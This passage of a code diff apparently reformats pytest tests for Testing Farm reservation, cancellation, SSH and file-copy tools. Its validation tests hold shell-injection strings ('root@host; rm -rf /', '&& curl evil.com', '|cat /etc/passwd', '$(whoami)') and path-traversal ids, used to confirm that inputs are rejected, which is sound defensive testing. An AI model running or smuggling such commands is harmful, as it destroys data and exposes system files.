= await GetTestingFarmReservationDetailsTool().run( - input={"request_id": "req-400"} - ) + out = await GetTestingFarmReservationDetailsTool().run(input={"request_id": "req-400"}) assert out.result == {"state": "running", "ssh_connection": "root@10.0.0.99"} @@ -338,18 +314,16 @@ async def test_reservation_details_multihost_realistic_tag(monkeypatch): "execute task #1\n" ) - flexmock(tf_module).should_receive("_testing_farm_api_get").with_args( - "requests/req-500" - ).and_return(api_response).once() + flexmock(tf_module).should_receive("_testing_farm_api_get").with_args("requests/req-500").and_return( + api_response + ).once() mock_resp = flexmock(ok=True, text=pipeline_log) flexmock(requests).should_receive("get").with_args( "https://artifacts.testing-farm.io/ghi789/pipeline.log", timeout=30 ).and_return(mock_resp).once() - out = await GetTestingFarmReservationDetailsTool().run( - input={"request_id": "req-500"} - ) + out = await GetTestingFarmReservationDetailsTool().run(input={"request_id": "req-500"}) assert out.result == {"state": "running", "ssh_connection": "root@10.31.8.81"} @@ -361,9 +335,7 @@ async def test_cancel_request_dry_run(monkeypatch): """DRY_RUN=true returns cancelled=True with message, no API call.""" monkeypatch.setenv("DRY_RUN", "true") - out = await CancelTestingFarmRequestTool().run( - input={"request_id": "req-cancel-dry"} - ) + out = await CancelTestingFarmRequestTool().run(input={"request_id": "req-cancel-dry"}) result = out.result assert result["cancelled"] is True assert result["request_id"] == "req-cancel-dry" @@ -377,13 +349,9 @@ async def test_cancel_request_calls_delete(monkeypatch): monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") tf_module._testing_farm_headers.cache_clear() - flexmock(tf_module).should_receive("_testing_farm_api_delete").with_args( - "requests/req-500" - ).once() + flexmock(tf_module).should_receive("_testing_farm_api_delete").with_args("requests/req-500").once() - await CancelTestingFarmRequestTool().run( - input={"request_id": "req-500"} - ) + await CancelTestingFarmRequestTool().run(input={"request_id": "req-500"}) @pytest.mark.asyncio @@ -392,13 +360,9 @@ async def test_cancel_request_returns_confirmation(monkeypatch): monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") tf_module._testing_farm_headers.cache_clear() - flexmock(tf_module).should_receive("_testing_farm_api_delete").with_args( - "requests/req-600" - ).once() + flexmock(tf_module).should_receive("_testing_farm_api_delete").with_args("requests/req-600").once() - out = await CancelTestingFarmRequestTool().run( - input={"request_id": "req-600"} - ) + out = await CancelTestingFarmRequestTool().run(input={"request_id": "req-600"}) assert out.result == {"cancelled": True, "request_id": "req-600"} @@ -457,9 +421,12 @@ async def test_run_remote_command_success(monkeypatch): # Verify SSH args include -i for gateway key mock_exec.assert_called_once_with( "ssh", - "-i", str(_SSH_KEY_PATH), - "-o", "StrictHostKeyChecking=no", - "-o", "UserKnownHostsFile=/dev/null", + "-i", + str(_SSH_KEY_PATH), + "-o", + "StrictHostKeyChecking=no", + "-o", + "UserKnownHostsFile=/dev/null", "root@10.0.0.1", "uname -r", stdout=asyncio.subprocess.PIPE, @@ -610,23 +577,26 @@ async def test_copy_files_timeout_kills_process(monkeypatch): pytest.raises(ToolError, match="timed out"), ): await CopyFilesToRemoteTool().run( - input={ - "ssh_host": "root@10.0.0.1", - "local_paths": ["/tmp/test.sh"], - "timeout": 5, - } - ) + input={ + "ssh_host": "root@10.0.0.1", + "local_paths": ["/tmp/test.sh"], + "timeout": 5, + } + ) fake_proc.kill.assert_called_once() fake_proc.wait.assert_awaited_once() -@pytest.mark.parametrize("bad_host", [ - "root@host; rm -rf /", - "root@host && curl evil.com", - "user@host|cat /etc/passwd", - "root@", -]) +@pytest.mark.parametrize( + "bad_host", + [ + "root@host; rm -rf /", + "root@host && curl evil.com", + "user@host|cat /etc/passwd", + "root@", + ], +) def test_ssh_host_pattern_rejects_injection(bad_host): """ssh_host pattern blocks shell metacharacters.""" with pytest.raises(ValidationError): @@ -654,12 +624,15 @@ def test_local_paths_guard_rejects_traversal(): ) -@pytest.mark.parametrize("bad_dir", [ - "/tmp/foo; curl evil.com", - "/tmp/foo && rm -rf /", - "/tmp/$(whoami)", - "/tmp/`id`", -]) +@pytest.mark.parametrize( + "bad_dir", + [ + "/tmp/foo; curl evil.com", + "/tmp/foo && rm -rf /", + "/tmp/$(whoami)", + "/tmp/`id`", + ], +) def test_remote_dir_pattern_rejects_injection(bad_dir): """remote_dir pattern blocks shell metacharacters.""" with pytest.raises(ValidationError): @@ -670,12 +643,15 @@ def test_remote_dir_pattern_rejects_injection(bad_dir): ) -@pytest.mark.parametrize("bad_id", [ - "../../admin", - "req-123/../../secrets", - "req 123", - "req;drop", -]) +@pytest.mark.parametrize( + "bad_id", + [ + "../../admin", + "req-123/../../secrets", + "req 123", + "req;drop", + ], +) def test_request_id_pattern_rejects_traversal(bad_id): """request_id pattern blocks path traversal and special characters.""" with pytest.raises(ValidationError): @@ -706,8 +682,6 @@ def fake_get(path, params=None): flexmock(tf_module).should_receive("_testing_farm_api_get").replace_with(fake_get) monkeypatch.setattr(asyncio, "sleep", AsyncMock()) - out = await GetTestingFarmReservationDetailsTool().run( - input={"request_id": "req-transient"} - ) + out = await GetTestingFarmReservationDetailsTool().run(input={"request_id": "req-transient"}) assert out.result["state"] == "complete" assert call_count == 2